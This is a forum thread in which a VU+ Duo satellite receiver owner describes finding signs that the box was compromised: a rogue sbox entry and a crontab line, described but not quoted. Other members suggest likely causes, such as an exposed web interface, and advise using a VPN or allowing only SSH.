Jump to content


Photo

VU duo was hacked this week


  • Please log in to reply
10 replies to this topic

#1 linuxgeek

  • Senior Member
  • 65 posts

+1
Neutral

Posted 21 October 2013 - 21:01

I found a rouge user and server in my sbox config today 

I know I was not there last week as checked it before going on a weeks holiday 

 

the scum bag has even put a line in the crontab to update their server of any ip changes to 

 guess they did not know my dns details or did not want to loose the connection if I changed it

 

I also found that my root pass would not change even though passwd said it had 

have not re flashed and set a new pass and dns / port to be sure 

 

 

thing is I have no idea how they got in / found me as I know the 5 people who connect to my sbox personally to its not like Im touting on the big CS sites 

 

 

 

is it possible that the attact has come in via TSmedia as I installed this and only started to use it a week ago made no other changes to the system 



Re: VU duo was hacked this week #2 WanWizard

  • PLi® Core member
  • 70,993 posts

+1,837
Excellent

Posted 21 October 2013 - 21:12

What else do you have open to the internet? ssh? ftp? webif? something else? No password on the webif? Used a standard or guessable password?


Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Ultimate (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)

Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.

Many answers to your question can be found in our new and improved wiki.


Re: VU duo was hacked this week #3 linuxgeek

  • Senior Member
  • 65 posts

+1
Neutral

Posted 21 October 2013 - 21:22

did not use standard passwords or ports

 

passwords were no not standard containing numbers and letters 

 

did have a port open for webif but was not port 80 

 

is the web interface considered insecure ?


Edited by linuxgeek, 21 October 2013 - 21:23.


Re: VU duo was hacked this week #4 WanWizard

  • PLi® Core member
  • 70,993 posts

+1,837
Excellent

Posted 21 October 2013 - 21:24

I don't know, it's a 3rd party application, but I find it unlikely that files are edited via the webif.


Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Ultimate (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)

Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.

Many answers to your question can be found in our new and improved wiki.


Re: VU duo was hacked this week #5 betacentauri

  • PLi® Core member
  • 7,185 posts

+323
Excellent

Posted 21 October 2013 - 21:33

Only webif and not ftp, ssh, telnet,... port?
Xtrend ET-9200, ET-8000, ET-10000, OpenPliPC on Ubuntu 12.04

Re: VU duo was hacked this week #6 linuxgeek

  • Senior Member
  • 65 posts

+1
Neutral

Posted 21 October 2013 - 21:39

only web and a port of sbox nothing else there is no way I would open ftp of telnet 



Re: VU duo was hacked this week #7 Sjaaky

  • Senior Member
  • 7,443 posts

+41
Good

Posted 21 October 2013 - 21:48

I don't consider the webif save to open up to the internet. I don't know about any concrete exploits. But given the amount of exploits in software which was designed with security in mind, I would be surprised if the webif is free of exploits.

Re: VU duo was hacked this week #8 theparasol

  • Senior Member
  • 4,157 posts

+198
Excellent

Posted 21 October 2013 - 21:54

Just use vpn to connect to your lan and dont use portforwarding wan->lan


@Camping: ZGemma H.2S, Technisat Multytenne 4-in-1 @Home: Edision Mini 4K, Wave Frontier T55, EMP Centauri EMP DiSEqC 8/1 switch, 4x Inverto Ultra Black single LNB


Re: VU duo was hacked this week #9 mge

  • Senior Member
  • 102 posts

0
Neutral

Posted 23 October 2013 - 17:35

check your router, there is a botnet out. it makes a portforwarding from yor router to your stb. from there it looks for interesting data. Read the article:

 

http://www.heise.de/...er-1960334.html


Edited by mge, 23 October 2013 - 17:38.

ET4000
PLi-HD Skin

Re: VU duo was hacked this week #10 Pr2

  • PLi® Contributor
  • 6,200 posts

+261
Excellent

Posted 23 October 2013 - 18:35

This is not a botnet or whatever issue, he says that he create a port forwarding himself.

This is a very bad idea to openup any webif STB, softcam or whatever but people don't understand what they do and the risk they take, they think that by using non standard port they are protected...


NO SUPPORT by PM, it is a forum make your question public so everybody can benefit from the question/answer.
If you think that my answer helps you, you can press the up arrow in bottom right of the answer.

Wanna help with OpenPLi Translation? Please read our Wiki Information for translators

Sat: Hotbird 13.0E, Astra 19.2E, Eutelsat5A 5.0W
VU+ Solo 4K: 2*DVB-S2 + 2*DVB-C/T/T2 (used in DVB-C) & Duo 4K: 2*DVB-S2X + DVB-C (FBC)

AB-Com: PULSe 4K 1*DVB-S2X (+ DVB-C/T/T2)
Edision OS Mio 4K: 1*DVB-S2X + 1*DVB-C/T/T2
 


Re: VU duo was hacked this week #11 MiLo

  • PLi® Core member
  • 14,055 posts

+298
Excellent

Posted 23 October 2013 - 19:48

I always tell the same: SSH is safe. The rest is not.

 

Then usually people go "but this but that but ...", thinking they know better because their second cousin has a friend who had been married to the sister of a guy who worked for the NSA and he said it was safe. Then there's nothing more to say but "Well it's your gun, it's your foot, go ahead."

 

You should not forward ports from the internet to your box to any port but 22 (ssh). For the same reason you should not take a shotgun, point it at your left foot, and pull the trigger. It hurts. That's why.


Real musicians never die - they just decompose


2 user(s) are reading this topic

0 members, 2 guests, 0 anonymous users